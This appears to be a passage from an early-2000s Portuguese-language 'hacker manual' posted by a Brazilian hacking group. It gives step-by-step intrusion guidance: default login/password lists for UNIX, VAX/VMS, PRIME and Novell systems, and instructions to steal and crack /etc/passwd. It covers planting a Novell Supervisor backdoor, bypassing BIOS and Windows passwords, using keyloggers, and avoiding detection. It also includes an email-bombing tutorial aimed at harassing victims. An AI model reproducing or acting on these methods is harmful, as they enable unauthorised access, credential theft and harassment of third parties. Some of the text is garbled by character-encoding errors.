2.6 - Onde começar. Começe com sistemas pequenos como em universidades ou escritórios. Depois passe para redes maiores como telenet. A telenet é altamenter ecomendada  para novatos, pois ela tem um sistema de segurança muito vago. São milhares de conexões ao mesmo tempo, o que torna praticamente impossível a monitoração
de um usuário (você).

----------------------------------------------------------------

Entendendo os Sistemas

----------------------------------------------------------------
 

3.1 - Telenet
Telenet ou simplesmente Telnet, ‚ um sistema de interligação de computadores. Telnet é a internet das BBS's. São vários computadores, com seu sistema operacional próprio, associados próprios e arquivos próprios se interligando e compartilhando informações.
Abaixo, se encontra uma lista com os principais comando da Telnet:

-----------------------------------------------------------------------------

@ - command prompt
------------------------------------------------------------------------------
? - comando errado
------------------------------------------------------------------------------
Access Bared - A sua conexão não permite esse acesso
------------------------------------------------------------------------------
Access to This Address not permitted - Seu Nui não é autorizado a acessar esse endereço
------------------------------------------------------------------------------
Attempt Aborted - Desconectando do sistema
------------------------------------------------------------------------------
Busy - Todas as portas e destinos estão sendo usados
------------------------------------------------------------------------------
Collect Wats Call Not Permitted - Collect Wats calls não são permitidos pelo seu host o pelo Nui
------------------------------------------------------------------------------
Connected - Conectado
------------------------------------------------------------------------------
Connection From - Seu terminal recebeu uma chamada
------------------------------------------------------------------------------
Connection Pending - O sistema está se conectando com o Nua (digite d bye pa-
ra desconectar de imediato)
------------------------------------------------------------------------------
Disconnected - Seu terminal foi desconectado pelo que você ligou
------------------------------------------------------------------------------
Enhanced Network Services System Error - Sua chamada não pode ser validada
------------------------------------------------------------------------------
Enhanced Network services unavailable at this time - Serviço temporariamente desligado
------------------------------------------------------------------------------
Illegal Address - o endereço que você netrou é inválido
------------------------------------------------------------------------------
Invalid Charge Request - sua seleção de pagamento é inválida
------------------------------------------------------------------------------
Invalid User Id or Password - O Nui que você digitou é inválido
------------------------------------------------------------------------------
Local Congestion - Seu número de acesso local esta ocupado
------------------------------------------------------------------------------
Local Disconnect - Seu terminal foi desconectado
------------------------------------------------------------------------------
Local Network Outage - Um problema temporario esta o afastando da network
------------------------------------------------------------------------------
Local Procedure Error - Problemas na comunicação forçaram a network limpar a
sua conexão
------------------------------------------------------------------------------
Not Available,Not Operating,Not Responding - O computador  não pode aceitar o
seu pedido
------------------------------------------------------------------------------
Not Connected - Voce entrou com um comando que só funciona conectado ao sistema certo
------------------------------------------------------------------------------
Not Reachable - Uma condição temporária deixou voce sem acesso a network.
------------------------------------------------------------------------------
Password - É o prompt que aparece quando voce entra na Nui
------------------------------------------------------------------------------
*** Possible Data Loss - conexão resetada
------------------------------------------------------------------------------
Refused Collect Connection - O sistema pago selecionado, precisa ser pago antes da liberação
------------------------------------------------------------------------------
Rejecting - O host não aceitou a chamada
------------------------------------------------------------------------------
Remote Procedure Error - Problemas de comunicação, forçaram a network derrubá-lo
------------------------------------------------------------------------------
Still Connected - Voce se conectou em dois serviços ao mesmo tempo
------------------------------------------------------------------------------
Telenet XXX XXX - A porta que voce esta usando
------------------------------------------------------------------------------
Terminal - terminal prompt
------------------------------------------------------------------------------
Unable to validate call - Seu Nui foi temporariamente desligado
------------------------------------------------------------------------------
Unable to validate call contact admin - The Nui has been permently disabled Unknown Adress - Seu Nua deve ser inválido
------------------------------------------------------------------------------
Wats Call not permitted - Telenet In-wats calls não são permitidas pelo seu host ou Nua
 
 

3.2 - Sistemas Operacionais
Existem vários tipos de sistemas operacionais hoje em dia.Os mais conhecidos são o UNIX, o VAX's, o PRIME e a rede Novell. Os textos sobre como entrar nesses sistemas estão na seção 6.2 - HACK MODEM. O remote Access também é bem conhecido, mas é mais usado em programas específicos ou em BBS's.
3.3 - Definições
Access Number - O numero que voce disca para acessar diretamente a network (duh).
Nua (Network Users Address) - Nua é, basicamente, um número que voce disca
para acessar um serviço particular qualquer. Dentro do sistema voce pode usar
os recursos internos, ou pode acessar um Nua com um serviço específico para cada numero.
Nui (Network User Identification) - Nui é uma conta com password da network, como nas BBS só que aqui voce pode desfrutar de vários
serviços e sistemas diferentes.
DNIC (Data Network Identification Code) - DNIC é um código de 4 digitos. Pense que o DNIC é o prefixo e o Nua é seu número de telefone 
Outdial - Outdial é um modem conectado a network que, ligado a ele, voce pode fazer chamadas para fora da network como um telefone pessoal etc...

----------------------------------------------------------------

4 - Virus, Trojan Horses e Worms

----------------------------------------------------------------

4.1 - Virus
Virus é um programa independente que se auto reproduz. Ele ir se aclopar em outros programas e fazer cópias de si mesmo espalhando-se pelo winchester. O intuito do virus é destruir o corruptar informações do disco rigido ou baixar o rendimento do micro rodando programas maiores que a memória
disponível. Anti-vírus, só retiram os vírus que eles forem programados. Nenhum programa pode o proteger 100 % de vírus, pois a cada
momento estão sendo fabricados novos vírus em qualquer parte do mundo.

4.2 Trojan Horse (Cavalo de Tróia)
O cavalo de tróia é um programa que, como o vírus, se aclopa em um arquivo do winchester de um microcomputador infectado. Eles tem o intuito de roubar informações preciosas como passwords ou logins e, depois, enviá-las a
seu "dono"pela network automaticamente. Alguns antivírus retiram os Trojans outros não, mas nenhum retira todos.

4.3 Worm
Worm é o tipo de programa mais inteligente já criado. Ele não só se espalha pelo computador e espera pela sorte de infectar outro através de um disquete contaminado, ele tem o poder de se espalhar por toda a network. Os worms podem infectar toda uma rede de sistemas e fazer nelas um bom estrago.

-----------------------------------------------------------------

5 - PGP

-----------------------------------------------------------------

PGP ou Pretty Good Privacy é um programa de computador que encripta e decripta informações. Voce pode mandar e-mails ou até arquivos encriptados para uma pessoa que, com o mesmo PGP que você usou para encriptar, pode decriptar as informações e usá-las sem correr o risco de outra pessoa intercep-
tá-la. O PGP somente funciona quando é utilizada uma PUBLIC KEY.
Tanto o destinatário quanto o remetente precisam ter o mesmo PGP key, pois é com ele que as informações são enctiptadas e decriptadas pelo seu programa.

-----------------------------------------------------------------

6 - Hack ( a melhor parte)

--------------------------------------------------------

Essa sessão é dividida em duas partes: 1- HACK PC; 2- HACK MODEM.
Obs.: Na maior parte das explicaçoes abaixo são necessários VáRIOS  programas. Todos eles estao disponiveis na Fou HomePage (O
endereço está no fim do Manual.

--------------------------------------------------------

6.1 - Hack PC

--------------------------------------------------------

6.1.1 Password do BIOS
Para quebrar o password do BIOS você pode encontrar duas situações:
1- Se você pegar o computador depois que o password foi passado corretamente,
use um desses programas:
amipsw.com (230b)
ami.com (555b)
aw.com (1,83k)
amidecod.com (1,79k)
2- Se você pegar o computador desligado ou esquecer o password:
- Ligue o micro e entre o setup;
- Anote TODOS os dados em um papel;
> - Desligue e abra a CPU;
- Ache uma bateria na motherboard e rettire-a;
- Espere uns 20 minutos e recoloque a bbateria;
- Ligue o micro novamente e entre no seetup;
- Re-configure todos os dados que você anotou. _________________________________________________________________

6.1.2 Password do Windows
Para quebrar o password do Windows 3.x voce deve digitar"ctrl+alt+del"e
depois "enter"quando aparecer a caixa de verificação. Depois que voce passou  o password, edite o arquivo win.ini e apague as linhas
"load="e "run=".

Para quebrar o password no WIN95:
1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar.
2 - Se a caixa de verificação for Windows Password, digite "ctrl+alt+del", escolha a janela do password na lista que aparecer e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as
linhas "load="e "run=".

_____________________________________

6.1.3 Password do screen saver do Windows
Para retirar o password de Screen Saver do Windows 3.x voce deve editar o arquivo control.ini, apagando tudo o que tiver na area do password.
Para retirar o password do Screen Saver do WIN95, renomeie
todos os arquivos de extensão .pwl do diretório do windows. Anote os
nomes alterados em um papel para eventuais problemas.

Para desligar o screen saver sem ter o password no win 3.1 (ainda não
foi testado no 3.11 ou no WIN95), aperte ctrl+alt+del e enter várias vezes
que o screen saver ‚ fechado.
________________________________________________________________

6.1.4 Proteção de documentos do Word
Para retirar a proteção dos documentos do word use esse programa:
wfwcd.zip (19,8k)
________________________________________________________________

6.1.5 Proteção de arquivos ZIP
Para quebrar o password de arquivos ZIP use esse programa:
zipcrack.zip (12,3k)
________________________________________________________________

6.1.6 Proteção de arquivos ARJ
Para quebrar o password de arquivos ARJ use esse programa:
brkarj10.zip (13,1k)
________________________________________________________________

6.1.7 Copiando digitações ou macros de um micro
Para copiar teclas digitadas de um micro como passwords ou logins use um desses programas:
keycopy.zip - DOS - (3,31k)
keytrap.zip - WIN95 - (36,0k)

_______________________________________________________

6.1.8 Um editor hexadecimal
Para quebrar alguns pogramas, passwords ou códigos de entrada, é bom que voce tenha em mãos um bom programa editor de hexadecimal. Ele também é utilizado para remover os numeros seriais de programas como
ACDSee 9.0 e
etc...
Hex Workshop 32bits (375k)

_______________________________________________________

6.1.9 Escondendo informações
Para esconder informações ou até pequenos arquivos em arquivos de imagem do tipo .GIF (Compuserve), use esse programa:
Hide and Seek v. 4.1 (82,5k)

-----------------------------------------------------------------

6.2 - Hack Modem

-----------------------------------------------------------------

6.2.1 Encontrando o sistema
Para encontrar um computador com o sistema, voce deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar
via Telenet ou outro sistema de interligação de computadores.
War Dialer: VMB Hacker (40,7k)

_______________________________________________________

6.2.2 Sistemas UNIX
1. Entrando no sistema - Para entrar no sistema, você deve entrar com um "lo-
gin", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígi-
tos. Dai voce tem tres saídas:
1. Arrumar a lista de passwords com um hacker
2. Tentar entrar com os defaults
3. Ver quem está on-line com os comandos: who, rwho, finger;  e tentar entrar com seus logins mais tarde.
Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então voce pode dar a
sorte de encontrar um esquecido. Veja lista abaixo.

Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo

---------------------------------------------------------------

2. Dentro do sistema: Dentro do sistema, a primeira coisa que voce deve fazer é copiar o arquivo da lista de passwords. Ele se est em:
/etc/passwd. Nesse arquivo, voce vai encontrar as informações na seguinte sintaxe:
username:password:UserID:GroupID:descrição ou nome:homedir:shell
Ex.: fou:234abc56:7148:34:Fausto
Morais:/home/dir/fou:/bin/fou
Username: fou
Encrypted Password: 234abc56
User Number: 7148
Group Number: 34
Other Information: Fausto Morais
Home Directory: /home/dir/fou
Shell: /bin/fou

Esse arquivo muito prov velmente estar encriptado. O password estar escondido e, sem um programa para decript -la, a lista ser inútil. O programa de decriptação do password UNIX, trabalha em cima de um dicion
rio pr‚ moldado, comparando as palavras com o texto encriptado. ? bom lembrar que o Brute Force não vai decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras igusia com a mesma decriptacao) ele para e da
lista pronta.

Brute Force (14,4k)
Dictionary Maker (7,73k)
Antes de usar o programa decriptador que nao d certeza de sucesso, tente encontrar um login sem password pois assim, voce só precisar digitar o login para entrar no sistema. Ex.:
fou::7148:34:Fausto Morais:/home/dir/fou:/bin/fou
Depois da lista de passwords, pegue os seguintes arquivos:
/etc/group - é a lista de newsgroups e seus passwords
tambem encriptados.
sintaxe - groupname:password:group id:users in group
/etc/hosts - é a lista de hosts conectados ao sistemas.
étil quando a conexão é via telenet ou rlogin.
/usr/mail/<user name> - é onde estão guardadas as mensagens de cada usuário.

_______________________________________________________

6.2.3 Sistemas VAX/VMS
Para entrar no sistema VAX/VMS, voce deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguem ou tente os defaults.

Username: Password:
system operator
system manager
system system
system syslib
operator operator
systets uetp
systest systest
systest test
sysmaint sysmaint
sysmaint service
sysmaint digital
field field
field service
guest guest
guest sem password
demo demo
demo sem password
test test
decnet decnet

---------------------------------------------------------------

Dentro do sistema não há muito o que fazer. Voce pode tentar pegar a lista de passwords em: SYS$SYSTEM:SYSUAF.DAT, mas
normalmente, ela nao esta disponivel para os usuários Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele
guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se voce quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte...

_______________________________________________________

6.2.4 Sistemas PRIME
Para entrar no sistema PRIME voce dever fazer as mesmas coisas que fez
no UNIX e no VAX's.

Username: Password:
prime prime
primos primos
primos prime
primos_cs prime
primos_cs primos
primenet primenet
system system
system prime
system primos
netlink netlink
test test
guest guest
guest1 guest
________________________________________________________________

6.2.5 Rede Novell
1. Entrando no Sistema - Para quebrar a rede Novell voce deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell voce tambem pode tentar alguns defaults. Os defaults da rede Novell sao usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estÆo alguns defaults:

Login:
superisor
guest
admin
user_template
print
laser
hp_laser
printer
laserwriter
post
mail
gateway
gate
router
backup
wangtek
fax
faxuser
faxworks
test
archivist
chey_archsvr
windows_passthru

----------------------------------------------------------------

Se voce conseguir entrar com esses defaults, voce pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao
diretório SYS:PUBLIC, digite SYSCON e de enter. Entao v a User Information e veja
a lista com todos os logins desse servidor. Esses logins só poderao ser utilizados se estiverem sem password, pois a lista s¢ mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usu rio verdadeiro
quando ele se conecta. Esse sistema de segurança se chama Intruder Detection.
Se voce nao conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e
escreva CX /T /A /R. Com isso voce, provavelmente conseguir a lista dos usu
rios.
2. Conseguindo SuperAcess - Para conseguir um acesso Supervisor, que ‚ muito importante para fazer uma backdoor ou utilizar outros
recursos use esse programa:
nw-hack.zip (25,8k)

Os problemas de usar o nw-hack sao os seguintes: O password Supervisor é mudado para SUPER_HACKER; Todas as contas no servidor tem acesso Supervisor; o administrador do sistema logo saber que voce entrou na rede e acabar com os previlegios do acesso Supervisor mudando tambem seu password. A única coisa que voce pode fazer é deixar uma backdoor ou "porta dos fundos".
3. Deixando uma Porta dos Fundos - Uma porta dos fundos com previlegios de acesso Supervisor é como uma assinatura gr tis. Para
fazer isso, voce deve utilizar o seguinte programa:

super.zip (31,3k)

Esse programa foi escrito exatamente para deixar o usuário desligar e ligar o acesso Supervisor na hora que quiser. Faça então o
seguinte:
- Consiga aceso Supervisor com o nw-haccker;
- Ligue sua conta para supe equivalencyy com o super.exe;
- Se voce ganhar acesso Supervisor, de super equivalency a algum dos defaults (Guest, test, archivist, chey_archsvr...);

- Saia e entre na rede com o default que voce deu a super equivalency e ligue o acesso Supervisor com o super.exe;
- Saia e entre novamente com o login quue voce utilizou primeiro;
- Remova o acesso Supervisor.
Agora o default que voce escolheu pode ser ligado e desligado por voce, na hora que voce quiser para ter acesso Supervisor.
________________________________________________________________

6.2.6 Passwords muito utilizados
Se não houver outro jeito e voce precisar chutar os passwords, chute com inteligência e não vá começando: aaa, aab, aac, aad ...
Os passwords mais utilizados aqui no Brasil são:
- Times de futebol;
- Telefone;
- Sobrenome;
- Nome de computadores (pentium, ibm, eetc são encontrados com frequência);
- Apelidos;

- Nome de pessoas famosas;

- Passwords de teclas seguidas. Ex.: qwerty, asdfgh, zxcvbn ou aaa, bbb, ccc. O usuário que usa desse tipo de password não pensa em
hackers quebrando sua senha e sim na velocidade para dar login.
Por isso, quando você escolher seu password, faça uma mesclagem de letras e números. Ex. mouse/1997 - m1o9u9s7e. Parece óbvio, mas ninguém vai chutar um password desse tipo quando tentar quebrar seu login.

________________________________________________________________

6.2.7 E-mail
Nesta sessão voce encontrar arquivos para enviar e-mails bombs, e-mail sem remetente e os famosos PGPs.
Unabomb (59,9k) Para bombear o e-mail de alguém.
Upyours 3.0 (+-2Mb) O melhor programa de e-mail bomb
Anonimail (71,3k) Para enviar e-mails anônimos
AEgis Shell for PGP (2,6Mb) Um dos melhores programas de encriptação

Se você quiser enviar um E-Mail para Usenet, mande a mensagem para
<NEWSGROUP>@<SERVERNAME>, por exemplo.
Grupo: fou.morais
Gateway: news.demon.co.uk
Endereço: [email protected]
Abaixo est uma lista com alguns gateways:

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

 ------------------------------------------------------------------------

Unabomber

 Devido ao grande número de pedidos de ajuda no uso do Unabomber, aqui vai um tutorial completo sobre o programa.
INSTALAÇÃO: Descompacte o arquivo em um diretório qualquer.  Copie o arquivo iport.vbx para o system do Windows, arrume (faça download na Internet) um vbrun300.dll e copie tambem para o system. USO: Rode o programa, na área "Mail Server" escreva o servidor que voce usa para mandar E-Mails. (Veja isso na configuração do seu programa de mensagens) Escreva então o endereçoo da vítima em "To", o endereço que você quer ter em "From", e sua mensagem como você escreve normalmente. Área "Apparent Server", ‚ o servidor que vai aparecer como remetente na mensagem
que você enviar.

OBS: O remetente na mensagem estar escondido para pessoas comuns. Hackers, programadores ou qualquer especialista poder
descobrir o endereço do idiota que o bombeou. NÃO VACILE... Este programa serve para ser usado com lammers, portanto bombeie lammers.

------------------------------------------------------------------------

FIM DO MANUAL PROFISSIONAL DO HACKER.

----------------------------------------------------------------------------------

NOSSOS MELHORES HACKERS!

ELITE

K.L.L.S_H4CKER

K.L.L.S_CHAOS

K.L.L.S_VEODEN

K.L.L.S_ACIDBURNS

K.L.L.S_KILLER

K.L.L.S_CRAZY

K.L.L.S_KEVIN

K.L.L.S_RESCHER

K.L.L.S_EINSTEIN

ESPECIALISTAS EM SENHAS

K.L.L.S_WORDLIST

K.L.L.S_PASSWORD

K.L.L.S_PASSPRO

K.L.L.S_APOLO

K.L.L.S_EINSTEIN

  ---------------------------------------------------------------------------------

VISITE www.klls.kit.net

www.hackersklls.rg3.net

www.hackers-crazy.cjb.net

www.ataquehacker.rg3.net

EU NÃO ME RESPONSABILIZO PELO USO DAS INFORMAÇÕES AQUI COLOCADAS SE VOCÊ FIZER ALGO ERRADO PROBLEMA SEU,NÃO VAI DIZER Q APRENDEU NA MINHA HP OU NESTE MANUAL, DIVULGAÇÃO EU KERO,PROBLEMA NÃO....

Copyright © 2002-2003

K.L.L.S CORPORATION

--------------------------------------------------------------------------------

Voltar

««•.·.·´\/¯`·.·.•Copyright © 2004 Todos os direitos reservados à Hackers Crazy •.·.·´¯\/`·.·.•»»